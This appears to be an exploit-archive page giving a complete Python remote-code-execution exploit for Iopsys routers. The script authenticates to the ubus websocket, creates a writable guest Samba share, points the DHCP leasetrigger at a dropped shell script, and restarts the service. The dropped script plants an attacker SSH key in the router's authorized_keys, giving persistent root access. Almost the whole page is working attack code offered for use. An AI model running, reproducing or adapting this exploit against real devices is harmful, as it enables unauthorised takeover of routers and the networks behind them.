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Iopsys Router - dhcp Remote Code Execution
Security Risk Critical
Date add
#!/usr/bin/python import json import sys import subprocess import socket import os from time import sleep from websocket import create_connection def ubusAuth(host, username, password): ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"]) req = json.dumps({"jsonrpc":"2.0","method":"call", "params":["00000000000000000000000000000000","session","login", {"username": username,"password":password}], "id":666}) ws.send(req) response = json.loads(ws.recv()) ws.close() try: key = response.get('result')[1].get('ubus_rpc_session') except IndexError: return(None) return(key) def ubusCall(host, key, namespace, argument, params={}): ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"]) req = json.dumps({"jsonrpc":"2.0","method":"call", "params":[key,namespace,argument,params], "id":666}) ws.send(req) response = json.loads(ws.recv()) ws.close() try: result = response.get('result')[1] except IndexError: if response.get('result')[0] == 0: return(True) return(None) return(result) if __name__ == "__main__": host = "" payload = """ #!/bin/sh /bin/echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ== rsa-key-20170427" > /etc/dropbear/authorized_keys /usr/sbin/odhcpd-update exit 0 """ print("Authenticating...") key = ubusAuth(host, "user", "password") if (not key): print("Auth failed!") sys.exit(1) print("Got key: %s" % key) print("Adding Samba share...") smbcheck = json.dumps(ubusCall(host, key, "uci", "get", {"config":"samba"})) if ("pwned" in smbcheck): print("Samba share seems to already exist, skipping") else: smba = ubusCall(host, key, "uci", "add", {"config":"samba", "type":"sambashare", "values": {"name":"pwned", "read_only":"no", "create_mask":"0775", "dir_mask":"0775", "path":"/mnt/", "guest_ok":"yes"}}) if (not smba): print("Adding Samba share failed!") sys.exit(1) print("Enabling Samba...") smbe = ubusCall(host, key, "uci", "set", {"config":"samba", "type":"samba", "values": {"interface":"lan"}}) if (not smbe): print("Enabling Samba failed!") sys.exit(1) print("Committing changes...") smbc = ubusCall(host, key, "uci", "commit", {"config":"samba"}) if (not smbc): print("Committing changes failed!") sys.exit(1) print("Setting malicious leasetrigger...") lts = ubusCall(host, key, "uci", "set", {"config":"dhcp", "type":"odhcpd", "values": {"leasetrigger":"/mnt/pwn.sh"}}) if (not lts): print("Setting leasetrigger failed!") sys.exit(1) print("Committing changes...") ltc = ubusCall(host, key, "uci", "commit", {"config":"dhcp"}) if (not ltc): print("Committing changes failed!") sys.exit(1) print("Rebooting system...") reb = ubusCall(host, key, "juci.system", "reboot") if (not reb): print("Rebooting failed, try rebooting manually!") sys.exit(1) print("Waiting on reboot...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) isUp = None while (not isUp): try: sleep(10) s.connect((host, 8080)) isUp = True s.close() except: pass print("Creating temp file for payload...") with open(".payload.tmp","a+") as file: file.write(payload) path = os.path.realpath(file.name) print("Dropping payload...") subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path), shell=True, check=True) print("Payload dropped") print("Authenticating...") key = ubusAuth(host, "user", "password") if (not key): print("Auth failed!") sys.exit(1) print("Got key: %s" % key) print("Executing payload") eec = ubusCall(host, key, "juci.service", "stop", {"name":"odhcpd"}) if (not eec): print("Stopping odhcpd failed!") sys.exit(1) ees = ubusCall(host, key, "juci.service", "start", {"name":"odhcpd"}) if (not ees): print("Starting odhcpd failed!") sys.exit(1) print("Cleaning up...") os.remove(path) print("Exploitation complete") # 0day.today [2024-12-23] #